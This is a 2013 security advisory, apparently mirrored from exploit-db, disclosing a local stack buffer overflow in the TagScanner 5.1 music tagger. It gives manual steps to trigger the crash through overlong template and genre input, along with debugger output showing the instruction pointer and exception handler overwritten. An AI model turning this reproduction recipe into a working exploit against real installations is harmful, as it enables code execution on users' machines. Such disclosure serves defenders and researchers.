TagScanner 5.1 – Stack Buffer Overflow (PoC)

  • 作者: Vulnerability-Lab
    日期: 2013-03-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/24741/
  • Title:
    ======
    TagScanner v5.1 - Stack Buffer Overflow Vulnerability
    
    
    Date:
    =====
    2013-01-22
    
    
    References:
    ===========
    http://www.vulnerability-lab.com/get_content.php?id=831
    
    
    VL-ID:
    =====
    831
    
    
    Introduction:
    =============
    TagScanner is a multifunction program for organizing and managing your music collection. It can edit tags of mostly state-of-the-art 
    audio formats, rename files based on the tag information, generate tag information from filenames, and perform any transformations of 
    the text from tags and filenames. Also you may get album info via online databases like freedb or Amazon. Supports ID3v1, ID3v2, 
    Vorbis comments, APEv2, WindowsMedia and MP4(iTunes) tags.
    
    - Rename files based on the tag and file information
    - Powerful multiple files tag editor
    - Import tag information and album art from online databases like freedb or Amazon
    - Generate tag information from file/foldernames
    - Tag fields formatting and rearrangement
    - Words replacement and case conversion from tags and filenames
    - Supports MP3, OGG, FLAC, WMA, MPEG-4, Opus, Musepack, Monkey`s Audio, AAC, OptimFROG, SPEEX, WavPack, TrueAudio files
    - Supports ID3 1.0/1.1/2.2/2.3/2.4 tags, APE v1 and v2 tags, Vorbis Comments, WMA tags and MP4(iTunes) metadata
    - Supports for embedded lyrics and cover art
    - Resize cover art for portable devices on the fly
    - TAGs versions conversions
    - Quick playlists creation
    - Export information to HTML, XML CSV or any user-defined format
    - Full support for Unicode
    - Multilanguage interface
    - Built-in multiformat player
    
    Powerful TAG editor with batch functions and special features. Playlist maker with ability to export playlists to HTML or Excel. 
    Easy-to-use interface. Built-in player.
    
    (Copy of the Vendor Homepage: http://www.xdlab.ru/ )
    
    
    Abstract:
    =========
    The Vulnerability Laboratory Research Team discovered a local stack buffer overflow vulnerability in the Yandex xdLab TagScanner v5.1 software.
    
    
    Report-Timeline:
    ================
    2013-01-22:	Public Disclosure
    
    
    Status:
    ========
    Published
    
    
    Affected Products:
    ==================
    Yandex - XDLab
    Product: TagScanner 5.1
    
    
    Exploitation-Technique:
    =======================
    Local
    
    
    Severity:
    =========
    High
    
    
    Details:
    ========
    A local stack buffer overflow vulnerability is detected in the official Yandex xdLab TagScanner v5.1 software. 
    The buffer overflow occurs when data written to a buffer, due to insufficient bounds checking, corrupts data values 
    in memory addresses adjacent to the allocated buffer.
    
    The vulnerability is located in the `rename` module of the software when processing to load the `rename folder by tag` 
    function as listing. Local attackers can use the `Edit template` function of the rename module to overflow the memory 
    when processing to (buffer) list the inserted context (large). When the victim is processing to click with another system 
    user account the syncronized software context and clicks on the rename function for the tag listing the overflow occurs.
    The vulnerable add input parameters to exploit the local vulnerability are `Custom Genres` & `Templates for Foldernames`.
    
    The vulnerability can be exploited by privileged system user accounts with low or medium required user interaction.
    Successful exploitation of the buffer overflow vulnerability results in overruns of the buffer(s) boundary and overwrites adjacent memory.
    
    Vulnerable Module(s):
    				[+] Rename Folder by TAG - Genres and Templates
    
    Vulnerable Parameter(s):
    				[+] Custom Genres - Add
    				[+] Templates for Folderanmes - Add
    
    Affected Module(s):
    				[+] Rename Folder by TAG - TAG Listing (Component)
    
    
    Proof of Concept:
    =================
    The vulnerability can be exploited by local attackers with privileged system user account and medium required user interaction. For demonstration or reproduce ...
    
    Manually steps to reproduce ...
    
    1. Download the TagScanner v5.1 software of the yandex dxlab
    2. Start the software and include any random track from your hd to the main listing
    3. Click (Right) with the mouse on the listed track and open the rename folder by tag main function
    4. Click... > Edit templates
    5. Open the Genres and Templates section in the module
    6. Now choose one of the add function and click on + (Custom Genres or Templates for Foldernames)
    7. Start your fuzzer to process the request or include manually a large string (x bytes) since the block is empty
    8. Save it by opening the big black arrow (Left|Top) in the menu
    9. Choose the track by an easy click, click with right mouse button again and open the rename folder by tag listing
    10. The software will crash the and the overflow with the ability to overwrite occurs
    
    
    --- Debug Logs (Exception) ---
    
    (13e8.11dc): AV - code c0000005 (first chance)
    eax=00000000 ebx=00000000 ecx=00410041 edx=779cb46d esi=00000000 edi=00000000
    eip=41414141 esp=0018ea90 ebp=0018eab0 iopl=0 nv up ei pl zr na pe nc
    cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010246
    Tagscan+0x10041:
    41414141 0000add byte ptr [eax],alds:002b:00000000=??
    0:000> !exchain
    0018eaa4: ntdll!LdrRemoveLoadAsDataTable+d64 (779cb46d)
    0018eed0: Tagscan+14420 (00414420)
    0018eef0: Tagscan+1ead78 (005ead78)
    0018f154: Tagscan+10041 (41414141)
    Invalid exception stack at 41414141
    0:000> u
    Tagscan+0x10041:
    41414141 0000add byte ptr [eax],al
    00410043 00ac0041000000add byte ptr [eax+eax+41h],ch
    0041004a 0000add byte ptr [eax],al
    0041004c 0000add byte ptr [eax],al
    0041004e 0000add byte ptr [eax],al
    00410050 0000add byte ptr [eax],al
    00410052 0000add byte ptr [eax],al
    00410054 94xchgeax,esp
    0:000> a
    41414141
    
    --- APPCrash Logs ---
    EventType=APPCRASH (BEX)
    EventTime=130029411726060019
    ReportType=2
    Consent=1
    ReportIdentifier=ddec5c9b-6102-11e2-adfe-efaefe8363dd
    IntegratorReportIdentifier=ddec5c9a-6102-11e2-adfe-efaefe8363dd
    WOW64=1
    Response.type=4
    Sig[0].Name=Anwendungsname
    Sig[0].Value=Tagscan.exe
    Sig[1].Name=Anwendungsversion
    Sig[1].Value=5.1.6.30
    Sig[2].Name=Anwendungszeitstempel
    Sig[2].Value=50f57b7e
    Sig[3].Name=Fehlermodulname
    Sig[3].Value=Tagscan.exe
    Sig[4].Name=Fehlermodulversion
    Sig[4].Value=5.1.6.30
    Sig[5].Name=Fehlermodulzeitstempel
    Sig[5].Value=50f57b7e
    Sig[6].Name=Ausnahmecode
    Sig[6].Value=c0000005
    Sig[7].Name=Ausnahmeoffset
    Sig[7].Value=41414141
    DynamicSig[1].Name=Betriebsystemversion
    DynamicSig[1].Value=6.1.7601.2.1.0.768.3
    DynamicSig[2].Name=Gebietsschema-ID
    DynamicSig[2].Value=1031
    DynamicSig[22].Name=Zusatzinformation 1
    DynamicSig[22].Value=c9ed
    DynamicSig[23].Name=Zusatzinformation 2
    DynamicSig[23].Value=c9ed9ec450d4be6144400a9541f5eddb
    DynamicSig[24].Name=Zusatzinformation 3
    DynamicSig[24].Value=04ae
    DynamicSig[25].Name=Zusatzinformation 4
    DynamicSig[25].Value=04ae339f4a83b6a3d3bf04a428f6874f
    UI[2]=C:\Program Files (x86)\TagScanner\Tagscan.exe
    UI[3]=Ultimate TagScanner funktioniert nicht mehr
    UI[4]=Windows kann online nach einer L�sung f�r das Problem suchen.
    UI[5]=Online nach einer L�sung suchen und das Programm schlie�en
    UI[6]=Sp�ter online nach einer L�sung suchen und das Programm schlie�en
    UI[7]=Programm schlie�en
    LoadedModule[0]=C:\Program Files (x86)\TagScanner\Tagscan.exe
    LoadedModule[62]=C:\Program Files (x86)\TagScanner\plugins\bass_aac.dll
    LoadedModule[63]=C:\Program Files (x86)\TagScanner\plugins\bass_alac.dll
    LoadedModule[64]=C:\Program Files (x86)\TagScanner\plugins\bass_ape.dll
    LoadedModule[65]=C:\Program Files (x86)\TagScanner\plugins\bass_mpc.dll
    LoadedModule[66]=C:\Program Files (x86)\TagScanner\plugins\bass_ofr.dll
    LoadedModule[67]=C:\Program Files (x86)\TagScanner\OptimFROG.dll
    LoadedModule[68]=C:\Program Files (x86)\TagScanner\plugins\bass_spx.dll
    LoadedModule[69]=C:\Program Files (x86)\TagScanner\plugins\bass_tta.dll
    LoadedModule[70]=C:\Program Files (x86)\TagScanner\plugins\bass_wv.dll
    LoadedModule[71]=C:\Program Files (x86)\TagScanner\plugins\bassflac.dll
    LoadedModule[72]=C:\Program Files (x86)\TagScanner\plugins\basswma.dll
    LoadedModule[73]=C:\Program Files (x86)\TagScanner\plugins\bassopus.dll
    LoadedModule[74]=C:\Windows\system32\mswsock.dll
    LoadedModule[75]=C:\Windows\System32\wshtcpip.dll
    LoadedModule[76]=C:\Windows\system32\DNSAPI.dll
    LoadedModule[77]=C:\Program Files (x86)\Bonjour\mdnsNSP.dll
    LoadedModule[78]=C:\Windows\system32\Iphlpapi.DLL
    LoadedModule[79]=C:\Windows\system32\WINNSI.DLL
    LoadedModule[80]=C:\Windows\system32\rasadhlp.dll
    LoadedModule[81]=C:\Windows\System32\wship6.dll
    LoadedModule[82]=C:\Windows\system32\avrt.dll
    FriendlyEventName=Nicht mehr funktionsf�hig
    ConsentKey=APPCRASH
    AppName=Ultimate TagScanner
    AppPath=C:\Program Files (x86)\TagScanner\Tagscan.exe
    
    
    Solution:
    =========
    The vulnerability can be patched by a restriction of the input fields when processing to load the rename folder by tag listing.
    
    
    
    Risk:
    =====
    The security risk of the local buffer overflow vulnerability is estimated as high(-).
    
    
    Credits:
    ========
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
    
    
    Disclaimer:
    ===========
    The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
    either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
    Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
    profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
    states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
    may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
    or trade with fraud/stolen material.
    
    Domains:www.vulnerability-lab.com 	- www.vuln-lab.com			 - www.vulnerability-lab.com/register
    Contact:admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	 - research@vulnerability-lab.com
    Section:video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		 - news.vulnerability-lab.com
    Social:	twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	 - youtube.com/user/vulnerability0lab
    Feeds:	vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    
    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
    Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
    media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
    other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
    modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
    
    				 	Copyright � 2013 | Vulnerability Laboratory
    
    -- 
    VULNERABILITY RESEARCH LABORATORY
    LABORATORY RESEARCH TEAM
    CONTACT: research@vulnerability-lab.com